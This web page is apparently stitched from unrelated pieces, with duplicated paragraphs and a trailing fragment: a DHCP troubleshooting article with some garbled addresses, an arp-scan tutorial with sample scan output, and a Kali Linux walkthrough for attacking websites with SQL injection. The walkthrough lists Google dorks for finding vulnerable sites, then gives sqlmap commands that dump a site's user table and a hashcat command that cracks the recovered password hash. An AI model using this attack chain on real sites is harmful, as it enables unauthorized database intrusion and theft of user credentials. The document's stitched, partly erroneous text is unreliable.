Happy New year 2017 romentic song

Troubleshooting a DHCP Server

A look at the various reasons why a DHCP server might fail to lease IP addresses and the solutions to those problems.

If you use DHCP servers to automatically configure the TCP/IP settings for workstations in your organization, a DHCP failure can lead to a major disruption in service. After all, if a workstation is not able to acquire an IP address, then it will have no way of accessing any of the resources on your private network or on the Internet. In this article, I will discuss some techniques that you can use to troubleshoot DHCP server failures.

Inappropriate Address Assignment

One very common DHCP related issue is the assignment of an unexpected IP address. For example, suppose that your DHCP server was configured with an IP address scope of 192.168.0.1 to 192.1680.50. You would expect network hosts to be assigned IP addresses in this range. Now, suppose that a workstation on your network appeared to be having problems communicating with network servers. You issue an IPCONFIG /ALL command to view the workstation’s IP address configuration. Instead of the expected address range, the workstation has been assigned an address beginning with 169.254.

So what happened? If a host on your network is unexpectedly assigned an address beginning with 169.254, you can rest assured that the address was not assigned by your DHCP server. What actually has happened, is that the workstation has failed to contact a DHCP server. When this occurs, the workstation will assign itself an IP address using a Windows feature known as Automatic Private IP Addressing (APIPA).

Microsoft built Automatic Private IP Addressing into Windows as a way of helping those who have very small networks. For example, if you were to create a small Windows network, you would not have to manually configure IP addresses even if there were no DHCP server on the network. APIPA would automatically assign a unique class B IP address to each machine on the network. This is great for small home networks but completely inappropriate for larger networks.

If a workstation resorts to using an APIPA assigned address, it is because its requests for an IP address have gone unanswered. There are several possible causes for this problem. Assuming that the other computers on the network are able to acquire an IP address from your DHCP server, you can rule out the DHCP server as the cause of the problem.

More than likely, the issue is related to the networking hardware installed in the workstation that is having the problem. For example, the Network Interface Card might be assigned an incorrect driver. Another possible cause of the problem is that the patch cable is not plugged into the Network Interface Card, or is not connected to a switch on the other end.

Of course, just because only one computer on the network is having trouble obtaining an IP address doesn’t completely rule out the server as the cause of the problem. If other workstations are successfully obtaining IP addresses, then you can be sure that the server is working properly. However, it could be that the server has run out of IP addresses that it can assign to clients. You can easily tell if this is the problem by comparing the size of the DHCP address scope to the number of devices on your network that request IP addresses from the DHCP server.

Common DHCP Server Problems

If multiple workstations are experiencing problems with leasing IP addresses, then the problem is most likely related to the DHCP server itself. If you suspect that the DHCP server is the cause of the problem, then you might start off by doing some ping tests to verify that the DHCP server is able to communicate across the network.

If the DHCP server is able to communicate with other computers on the network, then I recommend verifying that the DHCP server has an IP address that is compatible with the scope that the server is configured to assign addresses from. For example, if the DHCP server’s scope consists of addresses from 192.168.0.1 to 192.168.0.50, then the server will not actually be able to assign those addresses unless the server itself has been assigned a static address in the same subnet range, such as 192.168.0.0 or 192.168.0.51.

 If this still doesn’t solve the problem, then I recommend checking the basics. For example, you should make sure that the DHCP server is still authorized by the Active Directory to lease IP addresses. You should also check to verify that the scope is active, and that the necessary services are running on the DHCP server.

IP Address Conflicts

Another problem that I have seen on occasions involves IP address conflicts among dynamically configured addresses. When you create a DHCP scope, it is the DHCP server’s responsibility to make sure that addresses within the scope are only leased to one client at a time. If that’s the case, then how is it possible to have an IP address conflict for dynamically assigned addresses?

There are two situations that I’ve run into that can cause this problem. The first time that I ever ran into this problem, I was able to determine which PCs had been assigned at the duplicate addresses. When I checked the TCP/IP configuration on those machines, I found that one of the machine’s IP addresses had been manually configured. It’s kind of a long story, but that machine’s user was running an unauthorized application that required a static IP address. The user got tired of having to reconfigure the application every time they used it, so they took the address that had been dynamically assigned to them, and entered it as a static address.

The likelihood of this happening today is fairly slim. When a particular situation occurred, Windows 98 was the current operating system. Windows 98 lacks many of the security features that we take for granted today. A properly secured workstation running Windows XP or Windows Vista should be resistant to end user reconfigurations. Even so, I wanted to at least mention this issue because it gives you something to look for if you have trouble solving the problem.

A much more common cause of this problem is that multiple DHCP servers are in use, and those DHCP servers have overlapping scopes. If you only have a single DHCP server on your network, do not make the mistake of immediately dismissing this idea as a possible cause of your problem. In all likelihood, there is probably a rogue DHCP server that is conflicting with your primary DHCP server.

Windows 2000 Server and Windows Server 2003 are both designed in such a way to prevent rogue DHCP servers from causing problems. A DHCP server can only issue IP addresses after it has been authorized by the Active Directory. The problem is that this only applies to Windows-based DHCP servers. DHCP servers running other operating systems are free to lease IP addresses to clients without having to be authorized by the Active Directory.

So has a user really gone through the trouble of installing a rogue, Linux based DHCP server? Probably not. A much more likely explanation is that a wireless access point, or a router intended for cable or DSL Internet connections is causing your problem. Such devices almost always have DHCP server’s built in. These devices typically use a scope range of 192.168.0.x or 192.168.1.x. If this happens to be the same IP address scope that your primary DHCP server uses, then you may run into a situation in which both DHCP servers are issuing addresses from the same address pool.

Conclusion

In this article, I’ve explained that there are a number of potential causes for DHCP failures. In most cases, these failures are related to simple communications problems between the DHCP server and the workstations that are trying to lease addresses.

Use arp-scan to find hidden devices in your network

The Address Resolution Protocol uses a simple message format containing one address resolution request or response. The size of the ARP message depends on the upper layer and lower layer address sizes, which are given by the type of networking protocol (usually IPv4) in use and the type of hardware or virtual link layer that the upper layer protocol is running on. The message header specifies these types, as well as the size of addresses of each. The message header is completed with the operation code for request (1) and reply (2). The payload of the packet consists of four addresses, the hardware and protocol address of the sender and receiver hosts.

The principal packet structure of ARP packets is shown in the following table which illustrates the case of IPv4 networks running on Ethernet. In this scenario, the packet has 48-bit fields for the sender hardware address (SHA) and target hardware address (THA), and 32-bit fields for the corresponding sender and target protocol addresses (SPA and TPA). Thus, the ARP packet size in this case is 28 bytes. The EtherType for ARP is 0x0806. (This appears in the Ethernet frame header when the payload is an ARP packet. Not to be confused with PTYPE below, which appears within this encapsulated ARP packet.)

If you have a device that is on the same network but not responding to any requests such as ping, HTTP, HTTPS etc. This is done intentionally, for example a Check Point Firewall doesn’t respond to anything by design. Similarly a Cisco ASA, Router or BIG-IP F5 might not respond to any requests as they are designed to be silent. In those cases, using arp-scan to scan MAC address is a quick way to find those devices.

arp-scan

The ARP Scan Tool (also called ARP Sweep or MAC Scanner) is a very fast ARP packet scanner that shows every active IPv4 device on your Subnet. Since ARP is non-routable, this type of scanner only works on the local LAN (local subnet or network segment).

The ARP Scan Tool shows all active devices even if they have firewalls. Devices cannot hide from ARP packets like they can hide from Ping. To find active IP addresses outside your subnet, use the Ping Scan Tool (a Ping Sweep tool AKA NetScanner).

Install arp-scan

Binary packages are available for the following operating systems:

1. Debian Linux: arp-scan is part of the standard Debian distribution on Lenny and later.
2. Ubuntu Linux: arp-scan is available from gutsy (7.10) in universe.
3. Fedora: arp-scan is available for Fedora 6 and later
4. RedHat Enterprise Linux: arp-scan is available for RedHat EL 5 and later
5. Gentoo Linux
6. FreeBSD: arp-scan is available from the FreeBSD ports collection
7. OpenBSD: arp-scan is available as an OpenBSD package

Installation is usually as simple as shown below for Debian or Ubuntu like distributions:

root@debian:~# apt-get install arp-scan
(or) 
user@ubuntu:~$ apt-get install arp-scan

Kali Linux being the awesome pentest distro it is, has it pre-installed.

Use arp-scan to find hidden devices

arp-scan can be used to discover IP hosts on the local network. It can discover all hosts, including those that block all IP traffic such as firewalls and systems with ingress filters.

arp-scan works on Ethernet and 802.11 wireless networks. It may also work with token ring and FDDI, but they have not been tested. It does not support serial links such as PPP or SLIP, because ARP is not supported on them. You will need to be root, or arp-scan must be SUID root, in order to run arp-scan, because the functions that it uses to read and write Ethernet packets require root privilege.

Discovering all hosts on the local network

If the system you are testing from has an address on the network you wish to scan, the simplest way to scan it is with a command similar to:

root@kali:~# arp-scan --interface=eth0 --localnet
(or) 
user@ubuntu:~$ sudo arp-scan --interface=eth0 --localnet

Here, --interface=eth0 represents the interface to use for scanning, and --localnet makes arp-scan scan all possible IP addresses on the network connected to this interface, as defined by the interface IP address and netmask. You can omit the --interface option, in which case arp-scan will search the system interface list for the lowest numbered, configured up interface (excluding loopback).

The network interface name depends on the operating system you are using, the network type (Ethernet, Wireless Etc), and for some operating systems on the interface card type as well. In this document, the interface name eth0 is used for examples except where a different network type is being discussed.

All arp-scan options have both a long form like --interface=eth0 and a corresponding short form like -I eth0.

I’ve used the long form in this document for clarity. I’ve also used wlan0 in the following example and I am on a Wireless network.

root@kali:~# arp-scan --interface=wlan0 --localnet
Interface: wlan0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.1.3    0b:1a:a0:c2:94:c0    Dell Inc
10.0.1.57    0b:0c:29:34:f9:6a    VMware, Inc.
10.0.1.69    d4:85:64:63:b7:48    Hewlett-Packard Company
10.0.1.70    0b:0c:29:6d:92:b5    VMware, Inc.
10.0.1.27    c4:e9:84:0e:c1:12    (Unknown)
10.0.1.148    28:80:23:ac:dd:c2    (Unknown)
10.0.1.150    0b:50:56:b1:80:db    VMware, Inc.
10.0.1.151    0b:50:56:b1:dc:a7    VMware, Inc.
10.0.1.195    18:a9:05:4b:61:58    Hewlett-Packard Company
10.0.1.198    ae:95:9a:69:f7:6c    (Unknown)
10.0.1.199    1e:a8:82:10:66:4a    (Unknown)
10.0.1.213    0b:50:56:b1:fd:62    VMware, Inc.
10.0.1.213    0b:50:56:b1:2b:08    VMware, Inc. (DUP: 2)
10.0.1.213    0b:50:56:b1:f3:b7    VMware, Inc. (DUP: 3)
10.0.1.213    0b:50:56:b1:f3:2b    VMware, Inc. (DUP: 4)
10.0.1.213    0b:50:56:b1:8f:5a    VMware, Inc. (DUP: 5)
10.0.1.240    0b:22:55:cb:59:81    CISCO SYSTEMS, INC.
10.0.1.242    3c:a8:2a:0f:d3:d2    (Unknown)
10.0.1.241    0b:25:84:69:6f:c0    CISCO SYSTEMS, INC.
10.0.1.243    3c:a8:2a:0e:c5:78    (Unknown)
10.0.1.244    0b:0c:29:4e:54:38    VMware, Inc.
10.0.1.250    0b:1b:54:97:68:8c    CISCO SYSTEMS, INC.
10.0.1.252    0b:21:d8:70:e4:4b    CISCO SYSTEMS, INC.
10.0.1.253    0b:19:55:9d:60:c1    CISCO SYSTEMS, INC.
10.0.1.145    bc:ea:fa:6f:ec:d2    (Unknown)
10.0.1.77    98:fc:11:ab:65:b9    Cisco-Linksys, LLC
10.0.1.178    48:5a:3f:12:d9:df    WISOL
10.0.1.167    f0:25:b7:3e:a1:b1    (Unknown)
10.0.1.182    60:57:18:71:c5:a5    Intel Corporate

29 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.259 seconds (113.32 hosts/sec). 29 responded
root@kali:~#

So in the above example arp-scan was used to scan the network of the device wlan0, and it discovered 29 alive nodes apart from localhost machine. The option --localnet makes arp-scan scan the local network.

Here is an example showing arp-scan being run against the network 10.0.1.0/24:

root@kali:~# arp-scan --interface=wlan0 10.0.1.0/24
(or)
user@ubuntu:~$ sudo arp-scan --interface=wlan0 10.0.1.0/24

Interface: wlan0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.1.3    0b:1a:a0:c2:94:c0    Dell Inc
10.0.1.57    0b:0c:29:34:f9:6a    VMware, Inc.
10.0.1.69    d4:85:64:63:b7:48    Hewlett-Packard Company
10.0.1.70    0b:0c:29:6d:92:b5    VMware, Inc.
10.0.1.41    ac:7b:a1:c6:14:e3    Intel Corporate
10.0.1.27    c4:e9:84:0e:c1:12    (Unknown)
10.0.1.145    bc:ea:fa:6f:ec:d2    (Unknown)
10.0.1.148    28:80:23:ac:dd:c2    (Unknown)
10.0.1.150    0b:50:56:b1:80:db    VMware, Inc.
10.0.1.151    0b:50:56:b1:dc:a7    VMware, Inc.
10.0.1.195    18:a9:05:4b:61:58    Hewlett-Packard Company
10.0.1.198    ae:95:9a:69:f7:6c    (Unknown)
10.0.1.199    1e:a8:82:10:66:4a    (Unknown)
10.0.1.213    0b:50:56:b1:fd:62    VMware, Inc.
10.0.1.213    0b:50:56:b1:f3:b7    VMware, Inc. (DUP: 2)
10.0.1.213    0b:50:56:b1:8f:5a    VMware, Inc. (DUP: 3)
10.0.1.213    0b:50:56:b1:2b:08    VMware, Inc. (DUP: 4)
10.0.1.213    0b:50:56:b1:f3:2b    VMware, Inc. (DUP: 5)
10.0.1.240    0b:22:55:cb:59:81    CISCO SYSTEMS, INC.
10.0.1.241    0b:25:84:69:6f:c0    CISCO SYSTEMS, INC.
10.0.1.242    3c:a8:2a:0f:d3:d2    (Unknown)
10.0.1.243    3c:a8:2a:0e:c5:78    (Unknown)
10.0.1.244    0b:0c:29:4e:54:38    VMware, Inc.
10.0.1.250    0b:1b:54:97:68:8c    CISCO SYSTEMS, INC.
10.0.1.252    0b:21:d8:70:e4:4b    CISCO SYSTEMS, INC.
10.0.1.253    0b:19:55:9d:60:c1    CISCO SYSTEMS, INC.
10.0.1.77    98:fc:11:ab:65:b9    Cisco-Linksys, LLC
10.0.1.182    60:57:18:71:c5:a5    Intel Corporate
10.0.1.178    48:5a:3f:12:d9:df    WISOL
10.0.1.174    84:7a:88:5c:a0:90    HTC Corporation
10.0.1.173    84:7a:88:30:5e:32    HTC Corporation

31 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.221 seconds (115.26 hosts/sec). 31 responded
root@kali:~#

Now I’ve found 31 hosts that responded to this new sweep, so those two are my hidden servers.

Using an interface without an IP address

You can still use arp-scan even if the interface does not have an IP address. If you use arp-scan in this way, it will use the IP address of 0.0.0.0 for the arpsha field in the ARP packet unless you specify the IP address to use with the –arpsha option.

Some operating systems will only respond to ARP requests if the IP address specified in the arpsha field is plausible. The exact rules vary between operating systems, but the most common is that the address in arpsha must be within the IP network of the interface that the ARP request is received on. This is explored further in the fingerprinting section.

ARP spoofing and Proxy ARP

Because ARP does not provide methods for authenticating ARP replies on a network, ARP replies can come from systems other than the one with the required Layer 2 address. An ARP proxy is a system which answers the ARP request on behalf of another system for which it will forward traffic, normally as a part of the network’s design, such as for a dialup internet service. By contrast, in ARP spoofing the answering system, or spoofer, replies to a request for another system’s address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network. Various software exists to both detect and perform ARP spoofing attacks, though ARP itself does not provide any methods of protection from such attacks.

arp-scan scan help menu - Click to expand

Conclusion

arp-scan is a simple tool yet very powerful.  Those of you who are familiar with Cisco Routers and switches, CheckPoint Firewall and Big-IP F5, you know it too well that sometimes the only way to find a device is by using a arp response. Once you’ve found the MAC address, you can find more info about that device by matching that MAC address to it’s vendor. It is importing to understand ARP/MAC responses for penetration tester and it is used heavily for arpspoof and Man-In-The-Middle Attack. It also helps in cases when someone is spoofing IP address and DoS-ing your server. You can however spoof MAC address easily to evade trace.

All in all, it’s a useful tool and you should try the commands shown above. It will help someday when you are scratching you head in the middle of a service outage!

Thanks for reading, do share.

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux.

What is SQLMAP

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux.

What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

[Source: www.sqlmap.org]

Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone is a way you never wished for. I think I can’t make it anymore clearer.

So here goes:

Contents [hide]

• What is SQLMAP
• Features
• Step 1: Find a Vulnerable Website
  • Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
  • Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
    • Microsoft SQL Server
    • MySQL Errors
    • Oracle Errors
    • PostgreSQL Errors
• Step 2: List DBMS databases using SQLMAP SQL Injection
• Step 3: List tables of target database using SQLMAP SQL Injection
• Step 4: List columns on target table of selected database using SQLMAP SQL Injection
• Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
• Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
• Step 7: Cracking password
  • Step 7.a: Identify Hash type
  • Step 7.b: Crack HASH using cudahashcat
• Conclusion

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Google Dork string Column 1	Google Dork string Column 2	Google Dork string Column 3
inurl:item_id=	inurl:review.php?id=	inurl:hosting_info.php?id=
inurl:newsid=	inurl:iniziativa.php?in=	inurl:gallery.php?id=
inurl:trainers.php?id=	inurl:curriculum.php?id=	inurl:rub.php?idr=
inurl:news-full.php?id=	inurl:labels.php?id=	inurl:view_faq.php?id=
inurl:news_display.php?getid=	inurl:story.php?id=	inurl:artikelinfo.php?id=
inurl:index2.php?option=	inurl:look.php?ID=	inurl:detail.php?ID=
inurl:readnews.php?id=	inurl:newsone.php?id=	inurl:index.php?=
inurl:top10.php?cat=	inurl:aboutbook.php?id=	inurl:profile_view.php?id=
inurl:newsone.php?id=	inurl:material.php?id=	inurl:category.php?id=
inurl:event.php?id=	inurl:opinions.php?id=	inurl:publications.php?id=
inurl:product-item.php?id=	inurl:announce.php?id=	inurl:fellows.php?id=
inurl:sql.php?id=	inurl:rub.php?idr=	inurl:downloads_info.php?id=
inurl:index.php?catid=	inurl:galeri_info.php?l=	inurl:prod_info.php?id=
inurl:news.php?catid=	inurl:tekst.php?idt=	inurl:shop.php?do=part&id=
inurl:index.php?id=	inurl:newscat.php?id=	inurl:productinfo.php?id=
inurl:news.php?id=	inurl:newsticker_info.php?idn=	inurl:collectionitem.php?id=
inurl:index.php?id=	inurl:rubrika.php?idr=	inurl:band_info.php?id=
inurl:trainers.php?id=	inurl:rubp.php?idr=	inurl:product.php?id=
inurl:buy.php?category=	inurl:offer.php?idf=	inurl:releases.php?id=
inurl:article.php?ID=	inurl:art.php?idm=	inurl:ray.php?id=
inurl:play_old.php?id=	inurl:title.php?id=	inurl:produit.php?id=
inurl:declaration_more.php?decl_id=	inurl:news_view.php?id=	inurl:pop.php?id=
inurl:pageid=	inurl:select_biblio.php?id=	inurl:shopping.php?id=
inurl:games.php?id=	inurl:humor.php?id=	inurl:productdetail.php?id=
inurl:page.php?file=	inurl:aboutbook.php?id=	inurl:post.php?id=
inurl:newsDetail.php?id=	inurl:ogl_inet.php?ogl_id=	inurl:viewshowdetail.php?id=
inurl:gallery.php?id=	inurl:fiche_spectacle.php?id=	inurl:clubpage.php?id=
inurl:article.php?id=	inurl:communique_detail.php?id=	inurl:memberInfo.php?id=
inurl:show.php?id=	inurl:sem.php3?id=	inurl:section.php?id=
inurl:staff_id=	inurl:kategorie.php4?id=	inurl:theme.php?id=
inurl:newsitem.php?num=	inurl:news.php?id=	inurl:page.php?id=
inurl:readnews.php?id=	inurl:index.php?id=	inurl:shredder-categories.php?id=
inurl:top10.php?cat=	inurl:faq2.php?id=	inurl:tradeCategory.php?id=
inurl:historialeer.php?num=	inurl:show_an.php?id=	inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=	inurl:preview.php?id=	inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=	inurl:loadpsb.php?id=	inurl:transcript.php?id=
inurl:forum_bds.php?num=	inurl:opinions.php?id=	inurl:channel_id=
inurl:game.php?id=	inurl:spr.php?id=	inurl:aboutbook.php?id=
inurl:view_product.php?id=	inurl:pages.php?id=	inurl:preview.php?id=
inurl:newsone.php?id=	inurl:announce.php?id=	inurl:loadpsb.php?id=
inurl:sw_comment.php?id=	inurl:clanek.php4?id=	inurl:pages.php?id=
inurl:news.php?id=	inurl:participant.php?id=
inurl:avd_start.php?avd=	inurl:download.php?id=
inurl:event.php?id=	inurl:main.php?id=
inurl:product-item.php?id=	inurl:review.php?id=
inurl:sql.php?id=	inurl:chappies.php?id=
inurl:material.php?id=	inurl:read.php?id=
inurl:clanek.php4?id=	inurl:prod_detail.php?id=
inurl:announce.php?id=	inurl:viewphoto.php?id=
inurl:chappies.php?id=	inurl:article.php?id=
inurl:read.php?id=	inurl:person.php?id=
inurl:viewapp.php?id=	inurl:productinfo.php?id=
inurl:viewphoto.php?id=	inurl:showimg.php?id=
inurl:rub.php?idr=	inurl:view.php?id=
inurl:galeri_info.php?l=	inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark).

So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.

See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.

Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12

Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)

Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website with.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases

See screenshot below.

This commands reveals quite a few interesting info:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database got 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and user_password .

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there, we now only need the password to for this user.. Next shows just that..

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.

That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.

I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linuxpost. If you’ve missed it, you’re missing out a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:

hash-identifier

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:

cudahashcat --help | grep DES

So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.

I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.

Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.

Conclusion

Thanks for reading and visiting my website.

There’s many other ways to get into a Database or obtain user information. You should practice such techniques on websites that you have permission to.

Please share and let everyone know how to test their websites using this technique.

Features

1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
